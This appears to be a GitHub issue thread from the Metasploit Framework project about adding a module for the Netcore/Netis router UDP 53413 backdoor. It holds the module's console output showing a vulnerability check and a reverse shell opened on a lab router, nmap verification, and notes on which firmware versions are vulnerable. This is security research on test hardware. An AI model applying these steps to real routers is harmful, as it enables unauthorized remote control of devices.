search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.99k stars 13.94k forks source link

add netcore udp 53413 backdoor #6876

Closed nixawk closed 8 years ago

nixawk commented 8 years ago

http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/ https://www.seebug.org/vuldb/ssvid-90227

I will try to add a new module to exploit the backdoor.

h00die commented 8 years ago

Edit: Just purchased a WF2414, will be here Tuesday. I volunteer to get this module done.

nixawk commented 8 years ago

@h00die is your router produced by netcore/netdis ?

h00die commented 8 years ago

netis WF2414 http://www.netis-systems.com/en/products/Wireless-Routers-Regular/64.html

h00die commented 8 years ago

Device should be in next week. In the meantime, i've started the module here: https://github.com/h00die/metasploit-framework/commit/713a061bffea6efc35fe49ce9d82dc1d0d73d1a1 The TrendMicro post says there is a hardcoded password in the firmware, haven't found a site that has what the password is. Anyone want to find that?

h00die commented 8 years ago

https://www.exploit-db.com/exploits/38470/ may contain one of the creds

h00die commented 8 years ago

for WF2414, looks like netis(WF2414)-V1.4.29433 is the patched version, netis(WF2414)-V1.4.27001 should be vulnerable, and is available.

nixawk commented 8 years ago

@h00die I've created a module as follow.

msf exploit(netcore_udp_53413_backdoor) > info

       Name: Netcore Udp 53413 Backdoor
     Module: exploit/linux/misc/netcore_udp_53413_backdoor
   Platform:
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-08-25

Provided by:
  Nixawk

Available targets:
  Id  Name
  --  ----
  0   MIPS Little Endian
  1   MIPS Big Endian

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.1.1      yes       The target address
  RPORT    53413            yes       The target port
  TIMEOUT  1000             yes       The socket connect timeout in milliseconds

Payload information:

Description:
  Routers manufactured by Netcore, a popular brand for networking
  equipment in China, have a wide-open backdoor that can be fairly
  easily exploited by attackers. These products are also sold under
  the Netis brand name outside of China. This backdoor allows
  cybercriminals to easily run arbitrary code on these routers,
  rendering it vulnerable as a security device.

References:
  https://www.seebug.org/vuldb/ssvid-90227
  http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/
msf exploit(netcore_udp_53413_backdoor) > show options

Module options (exploit/linux/misc/netcore_udp_53413_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    53413            yes       The target port
   TIMEOUT  1000             yes       The socket connect timeout in milliseconds

Exploit target:

   Id  Name
   --  ----
   0   MIPS Little Endian

msf exploit(netcore_udp_53413_backdoor) > set RHOST 192.168.1.1
RHOST => 192.168.1.1
msf exploit(netcore_udp_53413_backdoor) > check
[+] The target is vulnerable.
msf exploit(netcore_udp_53413_backdoor) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Exploiting...
[*] Command Stager progress -  12.54% done (196/1563 bytes)
[*] Command Stager progress -  25.08% done (392/1563 bytes)
[*] Command Stager progress -  37.62% done (588/1563 bytes)
[*] Command Stager progress -  50.16% done (784/1563 bytes)
[*] Command Stager progress -  62.70% done (980/1563 bytes)
[*] Command Stager progress -  75.24% done (1176/1563 bytes)
[*] Command Stager progress -  87.78% done (1372/1563 bytes)
[*] Command Stager progress - 100.00% done (1563/1563 bytes)
[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:54180) at 2016-05-16 00:52:43 -0500

pwd
/
ls
bin
cfg
dev
etc
lib
linuxrc
log
proc
sbin
sh
sys
tmp
usr
var
web
h00die commented 8 years ago

Source code?

nixawk commented 8 years ago

I'll make the code clear and give a module pr.

nixawk commented 8 years ago

https://github.com/rapid7/metasploit-framework/pull/6880

h00die commented 8 years ago

Wifi router is in, WF2414. Downgraded to Netis(WF2414)-V1.4.27001,2014.05.07 16:10

Ran nmap to verify the downgrade is vuln:

h00die@kali:~# nmap -sV -sU -p 53413 192.168.1.1
Starting Nmap 7.12 ( https://nmap.org ) at 2016-05-18 21:11 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0023s latency).
PORT      STATE SERVICE VERSION
53413/udp open  xdmcp   XDMCP (unwilling; status: .Login:)
MAC Address: 04:8D:38:XX:XX:XX (Netcore Technology)

which is exactly what it says on the disclosure, so it looks solid.

bcook-r7 commented 8 years ago

This appears to be resolved.